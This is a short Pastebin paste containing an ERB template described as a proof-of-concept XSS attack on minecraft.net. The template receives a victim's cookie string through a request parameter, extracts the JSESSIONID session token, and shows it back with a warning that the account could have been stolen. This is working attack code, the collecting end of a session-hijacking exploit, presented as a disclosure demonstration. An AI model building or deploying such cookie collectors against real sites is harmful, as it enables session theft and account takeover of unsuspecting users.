Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <%
- m = /JSESSIONID=(?<sess>[^;]+);/.match params[:c]
- unless m
- %>
- <h1> for this trick to work, you need to be logged into minecraft.net</h1>
- <%
- else
- %>
- <h1>your minecraft session cookie is <%= m[:sess] %></h1>
- <p>don't worry, none of your data was saved. this is just a proof of concept attack on an XSS vulnerability in minecraft.net. Pester notch to fix this <i>now</i>, because I just got your cookie and so can any bad guy</p>
- <p>In layman's terms, <b>I could have just stolen your account, and there's nothing you could have done to stop me</b></p>
- <%
- end
- %>
Add Comment
Please, Sign In to add comment